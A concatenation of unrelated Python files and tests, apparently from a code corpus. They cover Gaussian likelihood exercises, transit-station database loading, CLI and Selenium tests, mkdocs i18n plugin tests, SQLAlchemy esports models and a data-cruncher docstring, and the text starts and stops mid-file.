Expectation: ", multi.mu_) print("Covariance Matrix: ") print(multi.cov_) # Question 5 - Likelihood evaluation f1_space = np.linspace(-10, 10, 200) f3_space = np.linspace(-10, 10, 200) log_like = [] for i in range(len(f1_space)): log_like.append([]) for j in range(len(f3_space)): log_like[i].append(MultivariateGaussian.log_likelihood(np.array([f1_space[i], 0, f3_space[j], 0]),mult_cov,X)) heatmap = go.Figure(data = go.Heatmap(x = f3_space,y =f1_space,z = log_like)) heatmap.update_layout(showlegend = True,autosize = True,title = "Q5 Heatmap", xaxis_title = "$\\text{ f3 Values }$",yaxis_title = "$\\text{ f1 Values }$") heatmap.show() # Question 6 - Maximum likelihood maxi = np.max(log_like) arg_max = np.argmax(log_like) i = arg_max // 200 j = arg_max % 200 f1_max = f1_space[i] f3_max = f3_space[j] print("Max value is: ",maxi) print("f1 and f3 arg max:") print(f1_max,f3_max) if __name__ == '__main__': np.random.seed(0) test_univariate_gaussian() test_multivariate_gaussian() scottshepard/divvybikes-project0 import requests import mysql.connector import yaml r = requests.get('https://data.cityofchicago.org/resource/8mj8-j3c4.json') stations = r.json() with open("config.yml", 'r') as config_doc: config = yaml.safe_load(config_doc) cnx = mysql.connector.connect(**config) cursor = cnx.cursor() for station in stations: station['longitude'] = station['location']['coordinates'][0] station['latitude'] = station['location']['coordinates'][1] station['location'] = str(station['location']) print(station) add_station = ("INSERT INTO cta_stations" "(stop_id, direction_id, stop_name, station_name, \ station_descriptive_name, station_id, ada, red, blue, green, \ brown, pink, purple, purple_express, orange, yellow, \ longitude, latitude)" "VALUES (%(stop_id)s, %(direction_id)s, %(stop_name)s, \ %(station_name)s, %(station_descriptive_name)s, %(map_id)s, \ %(ada)s, %(red)s, %(blue)s, %(g)s, %(brn)s, %(pnk)s, \ %(p)s, %(pexp)s, %(o)s, %(y)s, \ %(longitude)s, %(latitude)s)") cursor.execute(add_station, station) cnx.commit() cursor.close() cnx.close()import re import tempfile from pathlib import Path import typer from typer.testing import CliRunner from drudgeyer.cli.add import main as add_main from drudgeyer.cli.delete import main from drudgeyer.cli.show import main as list_main app = typer.Typer() app.command("delete")(main) app.command("add")(add_main) app.command("list")(list_main) runner = CliRunner() def test_delete(mocker): with tempfile.TemporaryDirectory() as tempdir: mocker.patch("drudgeyer.cli.add.BASEDIR", Path(tempdir)) mocker.patch("drudgeyer.cli.show.BASEDIR", Path(tempdir)) mocker.patch("drudgeyer.cli.delete.BASEDIR", Path(tempdir)) # add test task result = runner.invoke(app, ["add", "echo 2"]) result = runner.invoke(app, ["add", "echo 3"]) assert result.exit_code == 0, result.stdout # query task ids result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout assert len(result.stdout.split("\n")) > 2, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] # delete task target = parsed[-1] result = runner.invoke(app, ["delete", target]) assert result.exit_code == 0, result.stdout result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] assert target not in parsed # with dependencies with tempfile.TemporaryDirectory() as tempsrcdir: srcdir = Path(tempsrcdir) (srcdir / "a.txt").touch() result = runner.invoke(app, ["echo 111", "-d", tempsrcdir]) # query task ids result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout assert len(result.stdout.split("\n")) > 2, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] # delete task target = parsed[-1] result = runner.invoke(app, ["delete", target]) assert result.exit_code == 0, result.stdout result = runner.invoke(app, ["list"]) assert result.exit_code == 0, result.stdout parsed = re.findall(r"\([0-9\-]+\)", result.stdout) parsed = [f.strip("()") for f in parsed] assert target not in parsed assert not (Path(tempdir) / "dep" / target).is_dir() def test_delete_failed(mocker): with tempfile.TemporaryDirectory() as tempdir: mocker.patch("drudgeyer.cli.delete.BASEDIR", Path(tempdir)) result = runner.invoke(app, ["delete", ""]) assert result.exit_code == 1, result.stdout with tempfile.TemporaryDirectory() as tempdir: mocker.patch("drudgeyer.cli.delete.BASEDIR", Path(tempdir)) result = runner.invoke(app, ["delete", "x"]) assert result.exit_code == 1, result.stdout lblaszkowski/python_training class ContactHelper: def __init__(self, app): self.app = app def fill_all_user_data(self, contact): wd = self.app.wd wd.find_element_by_name("firstname").send_keys(contact.firstname) wd.find_element_by_name("middlename").send_keys(contact.middlename) wd.find_element_by_name("lastname").send_keys(contact.lastname) wd.find_element_by_name("nickname").send_keys(contact .nickname) wd.find_element_by_name("photo").send_keys("C:\\python_training\\image\\images.jpg") wd.find_element_by_name("title").send_keys(contact.title_photo) wd.find_element_by_name("company").send_keys(contact.company) wd.find_element_by_name("address").send_keys(contact.address) wd.find_element_by_name("home").send_keys(contact.home) wd.find_element_by_name("mobile").send_keys(contact.mobile) wd.find_element_by_name("work").send_keys(contact.work) wd.find_element_by_name("fax").send_keys(contact.fax) wd.find_element_by_name("email").send_keys(contact.email) wd.find_element_by_name("email2").send_keys(contact.email2) wd.find_element_by_name("email3").send_keys(contact.email3) wd.find_element_by_name("homepage").send_keys(contact.homepage) wd.find_element_by_name("bday").send_keys(contact.bday) wd.find_element_by_name("bmonth").send_keys(contact.bmonth) wd.find_element_by_name("byear").send_keys(contact.byear) wd.find_element_by_name("aday").send_keys(contact.aday) wd.find_element_by_name("amonth").send_keys(contact.amonth) wd.find_element_by_name("ayear").send_keys(contact.ayear) wd.find_element_by_name("address2").send_keys(contact.address2) wd.find_element_by_name("phone2").send_keys(contact.phone2) wd.find_element_by_name("notes").send_keys(contact.notes) wd.find_element_by_name("submit").click() def del_contact_in_book_address(self): wd = self.app.wd wd.find_element_by_link_text("home").click() wd.find_element_by_name('selected[]').click() wd.find_element_by_xpath('//*[@id="content"]/form[2]/div[2]/input').click() wd.switch_to_alert().accept() def edit_contact_in_book_address(self, contact): wd = self.app.wd wd.find_element_by_link_text("home").click() wd.find_element_by_name('selected[]').click() wd.find_element_by_xpath('//*[@id="maintable"]/tbody/tr[3]/td[8]/a').click() wd.find_element_by_name("firstname").clear() wd.find_element_by_name("firstname").send_keys(contact.firstname) wd.find_element_by_name("lastname").send_keys(contact.lastname) wd.find_element_by_name("nickname").send_keys(contact.nickname) wd.find_element_by_name("photo").send_keys("C:\\python_training\\image\\images1.jpg") wd.find_element_by_name("title").send_keys(contact.title_photo) wd.find_element_by_name("address").send_keys(contact.address) wd.find_element_by_name("home").send_keys(contact.home) wd.find_element_by_name("mobile").send_keys(contact.mobile) wd.find_element_by_name("work").send_keys(contact.work) wd.find_element_by_name("fax").send_keys(contact.fax) wd.find_element_by_name("email").send_keys(contact.email) wd.find_element_by_name("bday").send_keys(contact.bday) wd.find_element_by_name("bmonth").send_keys(contact.bmonth) wd.find_element_by_name("byear").send_keys(contact.byear) wd.find_element_by_name("aday").send_keys(contact.aday) wd.find_element_by_name("amonth").send_keys(contact.amonth) wd.find_element_by_name("ayear").send_keys(contact.ayear) wd.find_element_by_name("update").click() def return_to_groups_page(self): wd = self.app.wd wd.find_element_by_link_text("home page").click() def count(self): wd = self.app.wd self.fill_all_user_data() return len(wd.find_elements_by_name("selected[]")) 10-100 #!/usr/bin/env python import os, numpy as np def np_concatenate(fold): aa = [] for name in os.listdir(fold): if not name.endswith(".npy"): continue path = os.path.join(fold, name) a = np.load(path) aa.append(a) pass c = np.concatenate(aa) return c if __name__ == '__main__': a_dir="/tmp/QCtxTest/rng_sequence_f_ni1000000_nj16_nk16_tranche100000" b_path = "/tmp/QCtxTest/rng_sequence_f_ni1000000_nj16_nk16_tranche1000000/rng_sequence_f_ni1000000_nj16_nk16_ioffset000000.npy" a = np_concatenate(a_dir) b = np.load(b_path) assert np.all( a == b ) import pytest from gramlock import gramlock def test_exists(): assert gramlock def test_yes_1(): s = 'abba' expected = 4 actual = gramlock(s) assert expected == actual def test_no_1(): s = 'abcd' expected = 0 actual = gramlock(s) assert expected == actual def test_yes_2(): s = 'ifailuhkqq' expected = 3 actual = gramlock(s) assert expected == actual def test_yes_3(): s = 'bbbb' expected = 10 actual = gramlock(s) assert expected == actual def test_yes_4(): s = 'cdcd' expected = 5 actual = gramlock(s) assert expected == actualimport shutil import os import glob import re import sys import platform import ctypes import pickle import alt.cfg import alt.system import builtins def slash(path): return path.replace('\\','/') def touch(filename): mkdir( dir(filename) ) open(filename,'w').close() def name_ext(filename): filename = slash(filename) pos0 = filename.rfind('/')+1 return filename[pos0:] def ext(filename): filename = slash(filename) pos0 = filename.rfind('/')+1 pos1 = filename.rfind('.') if pos1==-1 or pos1bmtk/tests/utils/reports/spike_trains/test_sonata_adaptor.py import pytest import os import numpy as np from bmtk.utils.reports.spike_trains import SpikeTrains, pop_na from bmtk.utils.reports.spike_trains import spike_train_buffer def full_path(file_path): cpath = os.path.dirname(os.path.realpath(__file__)) return os.path.join(cpath, file_path) @pytest.mark.parametrize('path', ['spike_files/spikes.old.h5']) def test_old_populations(path): path = full_path(path) st = SpikeTrains.from_sonata(full_path(path)) assert(st.populations == [pop_na]) node0_timestamps = st.get_times(node_id=0, population=pop_na) assert(len(node0_timestamps) > 0) assert(np.all(st.get_times(node_id=0) == node0_timestamps)) assert(np.all(st.get_times(node_id=0, population='should_still_work') == node0_timestamps)) @pytest.mark.parametrize('path', ['spike_files/spikes.one_pop.h5']) def test_single_populations(path): path = full_path(path) st = SpikeTrains.from_sonata(path) assert(st.populations == ['v1']) node0_timestamps = st.get_times(node_id=0, population='v1') assert(np.all(st.get_times(node_id=0) == node0_timestamps)) assert(st.get_times(node_id=0, population='should_not_work') == []) @pytest.mark.parametrize('path', ['spike_files/spikes.multipop.h5']) def test_multi_populations(path): path = full_path(path) st = SpikeTrains.from_sonata(path) assert('tw' in st.populations and 'lgn' in st.populations) n1_tw_ts = st.get_times(node_id=0, population='tw') n1_lgn_ts = st.get_times(node_id=0, population='lgn') assert(len(n1_tw_ts) > 0) assert(len(n1_lgn_ts) > 0) assert(not np.array_equal(n1_tw_ts, n1_lgn_ts)) # (np.any(n1_tw_ts != n1_lgn_ts)) assert(st.get_times(node_id=0, population='other') == []) @pytest.mark.parametrize('path', ['spike_files/spikes.multipop.h5']) def test_multipop_with_default(path): path = full_path(path) st = SpikeTrains.from_sonata(path, population='tw') assert('tw' in st.populations and 'lgn' not in st.populations) n1_tw_ts = st.get_times(node_id=0, population='tw') assert(len(n1_tw_ts) > 0) assert(np.all(n1_tw_ts == st.get_times(node_id=0))) def test_empty_spikes(): st = SpikeTrains(adaptor=spike_train_buffer.STMemoryBuffer()) output_path = full_path('output/tmpspikes.h5') st.to_sonata(path=output_path) st.close() st_empty = SpikeTrains.from_sonata(output_path) assert(st_empty.populations == []) assert(st_empty.n_spikes() == 0) assert(list(st_empty.spikes()) == []) os.remove(output_path) if __name__ == '__main__': #test_old_populations('spike_files/spikes.old.h5') #test_single_populations('spike_files/spikes.one_pop.h5') test_multi_populations('spike_files/spikes.multipop.h5') #test_multipop_with_default('spike_files/spikes.multipop.h5') #test_empty_spikes()0 from mkdocs.config.base import load_config def test_plugin_languages_backward_compat_1(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": {"fr": "français", "en": "english"}, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_2(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={"i18n": {"default_language": "en", "languages": {"en": "english"}}}, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_3(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={"i18n": {"default_language": "en", "languages": {"fr": "français"}}}, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "en", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_4(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": {"default": {"name": "english_default"}, "fr": "français"}, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english_default", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_5(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": "français", "en": { "name": "english", "build": True, "site_name": "English site name", }, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "English site name", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_6(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": {"name": "français", "link": "/fr"}, "en": { "name": "english", "build": False, "site_name": "MkDocs static i18n plugin tests", }, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "/fr", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_7(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": {"fr": {"name": "français"}, "en": {"name": "english"}}, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_8(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": "français", "en": {"name": "english", "build": True}, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_9(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default"}, "fr": "français", "en": {"name": "english", "build": False}, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_10(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"name": "english_default", "build": True}, "fr": "français", }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "english_default", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_11(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": {"build": True}, "fr": "français", }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "en": { "name": "en", "link": "./", "build": False, "site_name": "MkDocs static i18n plugin tests", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_12(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "fr", "languages": { "default": {"name": "french_default"}, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.config["languages"] == { "fr": { "name": "french_default", "link": "./", "build": True, "site_name": "MkDocs static i18n plugin tests", }, } def test_plugin_languages_backward_compat_13(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": { "name": "english_default", "site_name": "Default site name", }, "fr": {"name": "français", "site_name": "Site en Français"}, "en": { "name": "english", "build": True, "site_name": "English site name", }, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.default_language_options["site_name"] == "Default site name" assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "English site name", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "Site en Français", }, } Pierre-Thibault/neo-insert-imports1-10 # ----------------------------------------------- # This file has only comments for testing purpose STATIC_IMPORT_MARK # ----------------------------------------------- import pytest import blog # Generated by Django 3.1.6 on 2021-04-02 09:09 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Messages', fields=[ ('ipAddress', models.GenericIPAddressField(auto_created=True)), ('id', models.IntegerField(primary_key=True, serialize=False)), ('name', models.CharField(max_length=20, verbose_name='姓名')), ('content', models.CharField(max_length=5000, verbose_name='content')), ('createTime', models.DateTimeField(auto_now_add=True)), ], ), ] DrArtemi/riot-api from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import create_engine, Column, Table, ForeignKey, MetaData from sqlalchemy.orm import relationship from sqlalchemy import ( Integer, String, Date, DateTime, Float, Boolean, Text) Base = declarative_base() player_team_association_table = Table('PlayerTeam', Base.metadata, Column('team_id', ForeignKey('teams.id'), primary_key=True), Column('player_id', ForeignKey('players.id'), primary_key=True) ) def create_table(engine): Base.metadata.create_all(engine) class Leagues(Base): __tablename__ = "leagues" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) slug = Column('slug', String(50), unique=True) name = Column('name', String(150)) region = Column('region', String(50)) image_url = Column('image_url', String(150)) priority = Column('priority', Integer) priority_position = Column('priority_position', Integer) priority_status = Column('priority_status', String(50)) class Tournaments(Base): __tablename__ = "tournaments" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) slug = Column('slug', String(50), unique=True) start_date = Column('start_date', DateTime) end_date = Column('end_date', DateTime) # League league_id = Column(Integer, ForeignKey('leagues.id'), nullable=False, index=True) league = relationship("Leagues", backref="tournaments") class Stages(Base): __tablename__ = "stages" id = Column(Integer, primary_key=True) slug = Column('slug', String(50)) name = Column('name', String(150)) type = Column('type', String(50)) # Tournament tournament_id = Column(Integer, ForeignKey('tournaments.id'), nullable=False, index=True) tournament = relationship("Tournaments", backref="stages") class Matches(Base): __tablename__ = "matches" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) date = Column('date', DateTime) state = Column('state', String(50)) final_state = Column('final_state', String()) evolution = Column('evolution', String()) # Tournament stage_id = Column(Integer, ForeignKey('stages.id'), nullable=False, index=True) stage = relationship("Stages", backref="matches") # teams team_1_id = Column(Integer, ForeignKey('teams.id'), nullable=True, index=True) team_2_id = Column(Integer, ForeignKey('teams.id'), nullable=True, index=True) team_1 = relationship("Teams", foreign_keys=[team_1_id]) team_2 = relationship("Teams", foreign_keys=[team_2_id]) team_1_win = Column(Boolean) team_2_win = Column(Boolean) class Teams(Base): __tablename__ = "teams" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) slug = Column('slug', String(50)) code = Column('code', String(50)) name = Column('name', String(150)) image = Column('image', String(150)) alt_image = Column('alt_image', String(150)) bg_image = Column('bg_image', String(150)) status = Column('status', String(50)) # League league_id = Column(Integer, ForeignKey('leagues.id'), nullable=True, index=True) league = relationship("Leagues", backref="teams") class Players(Base): __tablename__ = "players" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) summoner_name = Column('summoner_name', String(50)) first_name = Column('first_name', String(50)) last_name = Column('last_name', String(50)) image = Column('image', String(150)) role = Column('role', String(50)) # Current team current_team_id = Column(Integer, ForeignKey('teams.id'), nullable=False, index=True) current_team = relationship("Teams", backref="current_players") # Teams teams = relationship("Teams", secondary=player_team_association_table, backref='players')N = int(input()) N %= 30 S = list('123456') for i in range(N): S[i%5], S[i%5+1] = S[i%5+1], S[i%5] print(''.join(S)) def binary_search(list, key): begin = 0 #assigning initial values end = len(list) while begin < end: mid = (begin + end)//2 if list[mid] > key: end = mid elif list[mid] < key: begin = mid + 1 else: return mid return -1 list = input('Enter the list of numbers(SORTED): ') list = list.split() list = [int(x) for x in list] key = int(input('Enter number to search: ')) #value to search index = binary_search(list, key) if index < 0: print('{} was not found.'.format(key)) else: print('{} was found at index {}.'.format(key, index)) cityofcapetown/cape-good-of-place-names # coding: utf-8 from __future__ import absolute_import import base64 import tempfile from flask import json, current_app from six import BytesIO from cape_of_good_place_names import util from cape_of_good_place_names.models.error import Error # noqa: E501 from cape_of_good_place_names.models.geolookup_results import GeolookupResults # noqa: E501 from cape_of_good_place_names.test import BaseTestCase class GeoLookupTestConfig(object): TIMEZONE = "Africa/Johannesburg" USER_SECRETS_FILE = "" USER_SECRETS_SALT_KEY = "" GEOCODERS = [] GEOCODERS_MIN = 0 SCRUBBERS = [] SCRUBBERS_MIN = 0 class TestGeoLookupController(BaseTestCase): """DefaultController integration test stubs""" def setUp(self) -> None: credentials = base64.b64encode(b"test_user:_password").decode('utf-8') self.authorisation_headers = {"Authorization": "Basic {}".format(credentials)} # Setting up the GeoLookup data files tc = GeoLookupTestConfig() self.temp_dir = tempfile.TemporaryDirectory() tc.GEOLOOKUP_DATASET_DIR = self.temp_dir.name temp_geojson = { "type": "FeatureCollection", "features": [{ "type": "Feature", "geometry": { "type": "Point", "coordinates": [0.0, 0.0] }, "properties": { "temp_id": "centre_of_the_world" }}] } temp_layer_file_path = self.temp_dir.name + "temp_layer.geojson" with open(temp_layer_file_path, "w") as temp_layer_file: json.dump(temp_geojson, temp_layer_file) tc.GEOLOOKUP_DATASET_CONFIG = { "temp_layer": (temp_layer_file.name, "temp_id") } current_app.config.from_object(tc) util.flush_caches() def tearDown(self) -> None: self.temp_dir.cleanup() def test_geolookup(self): """Vanilla test case for geolookup of specific ID Translate a spatial identifier into a description of space """ # Looking up a specific ID query_string = [('spatial_id', 'centre_of_the_world'), ('spatial_dataset_id', 'temp_layer')] response = self.client.open( '/v1/boundary_lookup', method='GET', query_string=query_string, headers=self.authorisation_headers ) self.assert200(response, 'Response body is : ' + response.data.decode('utf-8')) # Asserting that we get back the results we expect data_dict = json.loads(response.data) self.assertIn("results", data_dict) results = data_dict["results"] self.assertEqual(len(data_dict["results"]), 1, "Boundary Lookup is not returning the expected number of test results") # Inspecting the result itself result, *_ = results self.assertEqual(result["geolookup_id"], "centre_of_the_world", "Spatial ID not mapped through correctly") result_dict = json.loads(result["geolookup_value"]) self.assertEqual( result_dict, {"features": [ {"geometry": {"coordinates": [0.0, 0.0], "type": "Point"}, "properties": {"temp_id": "centre_of_the_world"}, "type": "Feature"}], "type": "FeatureCollection"}, "Geolookedup value not mapped through correctly" ) def test_geolookup_dataset(self): """Vanilla test case for geolookup of whole dataset Translate a spatial identifier into a description of space """ # Looking up a specific ID query_string = [('spatial_dataset_id', 'temp_layer')] response = self.client.open( '/v1/boundary_lookup', method='GET', query_string=query_string, headers=self.authorisation_headers ) self.assert200(response, 'Response body is : ' + response.data.decode('utf-8')) # Asserting that we get back the results we expect data_dict = json.loads(response.data) self.assertIn("results", data_dict) results = data_dict["results"] self.assertEqual(len(data_dict["results"]), 1, "Boundary Lookup is not returning the expected number of test results") # Inspecting the result itself result, *_ = results self.assertEqual(result["geolookup_id"], "temp_layer", "Spatial Dataset ID not mapped through correctly") result_dict = json.loads(result["geolookup_value"]) self.assertEqual( result_dict, {"features": [ {"geometry": {"coordinates": [0.0, 0.0], "type": "Point"}, "properties": {"temp_id": "centre_of_the_world"}, "type": "Feature"}], "type": "FeatureCollection"}, "Geolookedup value not mapped through correctly" ) if __name__ == '__main__': import unittest unittest.main() import unittest from unittest.mock import patch from tmc import points from tmc.utils import load, load_module, reload_module, get_stdout, check_source from functools import reduce import os import textwrap exercise = 'src.integers_to_strings' function = 'formatted' def get_correct(test_case: list) -> list: return [f"{x:.2f}" for x in test_case] @points('4.integers_to_strings') class IntegersToStringsTest(unittest.TestCase): @classmethod def setUpClass(cls): with patch('builtins.input', side_effect=[AssertionError("Asking input from the user was not expected")]): cls.module = load_module(exercise, 'en') def test_0_main_program_ok(self): ok, line = check_source(self.module) message = """The code for testing the functions should be placed inside if __name__ == "__main__": block. The following row should be moved: """ self.assertTrue(ok, message+line) def test_1_function_exists(self): try: from src.integers_to_strings import formatted formatted([0.23]) except: self.assertTrue(False, 'Your code should contain function named as formatted(my_list: list)') try: formatted = load(exercise, function, 'en') formatted([0.23]) except: self.assertTrue(False, 'Make sure, that function can be called as follows formatted([0.23])') def test_2_type_of_return_value(self): formatted = load(exercise, function, 'en') val = formatted([1.23]) self.assertTrue(type(val) == list, "Function formatted does not return list with parameter value [1.23].") if __name__ == '__main__': unittest.main()amih90/bacpypes #!/usr/bin/env python # -*- coding: utf-8 -*- """ Test Choice ----------- """ import unittest from bacpypes.basetypes import Scale from bacpypes.debugging import bacpypes_debugging, ModuleLogger from bacpypes.primitivedata import Tag, TagList # some debugging _debug = 0 _log = ModuleLogger(globals()) @bacpypes_debugging class TestScaleChoice(unittest.TestCase): def test_scale_choice(self): if _debug: TestScaleChoice._debug("test_scale_choice") taglist = TagList([Tag(1, 1, 1, bytearray(b'\x00'))]) scale = Scale() scale.decode(taglist) self.assertDictEqual(scale.dict_contents(), {'integerScale': 0}) """ Module for the database cruncher which uses the 'rolling windows' technique. """ import logging import numpy as np import scipy.interpolate from pyam import IamDataFrame from ..stats import rolling_window_find_quantiles from ..utils import _get_unit_of_variable from .base import _DatabaseCruncher logger = logging.getLogger(__name__) class QuantileRollingWindows(_DatabaseCruncher): """ Database cruncher which uses the 'rolling windows' technique. This cruncher derives the relationship between two variables by performing quantile calculations between the follower timeseries and the lead timeseries. These calculations are performed at each timestep in the timeseries, independent of the other timesteps. For each timestep, the lead timeseries axis is divided into multiple evenly spaced windows (to date this is only tested on 1:1 relationships but may work with more than one lead timeseries). In each window, every data point in the database is included. However, the data points receive a weight given by .. math:: w(x, x_{\\text{window}}) = \\frac{1}{1 + (d_n)^2} where :math:`w` is the weight and :math:`d_n` is the normalised distance between the centre of the window and the data point's position on the lead timeseries axis. :math:`d_n` is calculated as .. math:: d_n = \\frac{x - x_{\\text{window}}}{f \\times (\\frac{b}{2})} where :math:`x` is the position of the data point on the lead timeseries axis, :math:`x_{\\text{window}}` is the position of the centre of the window on the lead timeseries axis, :math:`b` is the distance between window centres and :math:`f` is a decay factor which controls how much less points away from :math:`x_{\\text{window}}` are weighted. If :math:`f=1` then a point which is half the width between window centres away receives a weighting of :math:`1/2`. Lowering the value of :math:`f` cause points further from the window centre to receive less weight. With these weightings, the desired quantile of the data is then calculated. This calculation is done by sorting the data by the database's follow timeseries values (then by lead timeseries values in the case of identical follow values). From here, the weight of each point is calculated following the formula given above. We calculate the cumulative sum of weights, and then the cumulative sum up to half weights, defined by .. math:: c_{hw} = c_w 